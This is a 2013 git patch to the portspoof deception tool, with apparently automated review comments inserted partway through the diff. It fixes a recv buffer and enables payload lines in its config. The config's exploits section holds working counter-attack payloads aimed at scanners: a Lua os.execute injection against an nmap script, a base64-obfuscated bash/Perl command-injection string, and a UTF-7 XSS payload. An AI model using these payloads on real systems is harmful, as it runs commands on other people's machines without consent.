From 600287f90f0dddf8ab06c5cc13ad42f43b192547 Mon Sep 17 00:00:00 2001
From: Piotr Duszynski
Date: Thu, 1 Aug 2013 22:02:20 +0200
Subject: [PATCH] Fixed buffer len for recv

---
 src/connection.cpp | 5 ++---
 tools/portspoof.conf | 28 +++++++++++++++++++---------
 2 files changed, 21 insertions(+), 12 deletions(-)

diff --git a/src/connection.cpp b/src/connection.cpp
index a1346c2..0e60599 100755
--- a/src/connection.cpp
+++ b/src/connection.cpp
@@ -69,7 +69,7 @@ void* process_connection(void *arg)
 int tid = *((int*)(&arg));
 //int len;
 string str;
-char buffer;
+char buffer[1000];//TODO: to be fixed
 int original_port=DEFAULT_PORT;
 int n = 0;
 time_t timestamp;
@@ -79,7 +79,6 @@ void* process_connection(void *arg)
 while(1)
 {
-sleep(1);
 for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
 {
@@ -91,7 +90,7 @@ void* process_connection(void *arg)
 if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER)) n = 1; // just reply...
 else
-n = recv(threads[tid].clients[i], &buffer,1, 0);
+n = recv(threads[tid].clients[i], buffer,1, 0);
 // deal with different recv buffer size
diff --git a/tools/portspoof.conf b/tools/portspoof.conf
index e079efc..05d315d 100755
--- a/tools/portspoof.conf
+++ b/tools/portspoof.conf
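Review bot: The new `char buffer[1000]` in the first hunk is still read with a hard-coded length of 1 in the third hunk (`n = recv(threads[tid].clients[i], buffer,1, 0);`), so the storage size and the read length are two unrelated literals and the `//TODO: to be fixed` comment is the only thing recording that; tie them together so a later change to one cannot outgrow the other, e.g. `enum { RECV_BUF_SIZE = 1000 };` / `char buffer[RECV_BUF_SIZE];` and `n = recv(threads[tid].clients[i], buffer, sizeof buffer - 1, 0);`. recv() returns raw bytes with no terminator, so if the data is later handled as a C string the caller must check `n > 0` and set `buffer[n] = '\0'` before any string function sees it; the code after the recv call is outside the hunk, so I cannot confirm whether it does. The same point applies to both the first and third hunks of src/connection.cpp, and process_connection's body begins and ends outside them.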
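Review bot: Dropping `sleep(1);` from the `while(1)` loop in the second hunk means every slot of `threads[tid].clients` is now polled back-to-back with no wait between passes; if those sockets are non-blocking (their setup is outside the hunk), an idle thread will spin on recv() calls that return immediately, which is a CPU-exhaustion risk once many connections are open. A readiness wait such as `poll()` over the thread's client descriptors, or at minimum a short `usleep()`, would keep the responsiveness gain without the busy loop. The loop body continues past the end of the hunk.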
@@ -75,23 +75,33 @@ #Example: port range -#51-60 "550 4m2v4 (FUZZ_HERE)" +51-60 "550 4m2v4 (FUZZ_HERE)" #Example: Simple regular expression payloads -#8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n" -#8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n" -#8082 "word: ... \. \d \w \n" +8080 "word: [\w]+ [\d]+ [a-b]+ [1-2]+\n" +8081 "OK0100 eXtremail V([\d.]+) release (\d+) REMote management \.\.\.\r\n" +8082 "word: ... \. \d \w \n" #Nmap regular expression matched payloads -#8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n" -#8101 "220 FUZZ_HERE SMTP ready to roll\r\n" -#8102 "550 12345 FUZZ_HERE" -#8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n" -#8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
" +8100 "220 FUZZ_HERE ESMTP OpenSMTPD\r\n" +8101 "220 FUZZ_HERE SMTP ready to roll\r\n" +8102 "550 12345 FUZZ_HERE" +8103 "+OK Lotus Notes POP3 server version lLlfMoHcd ready j* on __FUZZ_HERE__\r\n" +8104 "HTTP/1.0 200 OK\r\nServer: Apache/__FUZZ__(Amazon)\r\nX-Powered-By: ASP\.NET\r\nCache-Control: no-cache, must-revalidate\r\nContent-type: text/html\r\nX-Powered-By: PHP/xxx\r\nExpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nLog In - Juniper Web Device Manager
Apache mod_perl/2.0.4 Perl/v5.10.1 Server at devtest.myhost.co.za Port 80
" ## EXPLOITS ## +# NMAP +# nmap --script http-domino-enum-passwords.nse -p 80 172.16.37.145 -sC -PN -n --script-args domino-enum-passwords.username='xxx',domino-enum-passwords.password='secr',domino-enum-passwords.idpath='/tmp/' -d4 + +80 "HTTP/1\.0 200 OK\r\nServer: Apache/(IBM_Lotus_Domino_v\.6\.5\.\d)\r\n\r\n--\r\n--\r\n--\r\n--\r\n\r\n--\r\n--
\r\n--\r\n--\r\nos\x2eexecute\x28\x22echo 'You have been PWNed';whoami; uname -a\x22\x29;\x0d\x0a\x0d\x0a" + #OS cmd injection payload for bash: $(cat output) and `cat output` injections 8080 "/bin/bash\t-c\t{perl,-e,$0,useSPACEMIME::Base64,cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw==}\t$_=$ARGV\x5b0\x5d;~s/SPACE/\x5ct/ig;eval;$_=$ARGV\x5b1\x5d;eval\x28decode_base64\x28$_\x29\x29;" + +#McAffe SuperScan UTF7 XSS payload +1010 "+ADw-img src=x onerror='a setter=alert,a=\x22UTF-7-XSS\x22;'+AD4-" + +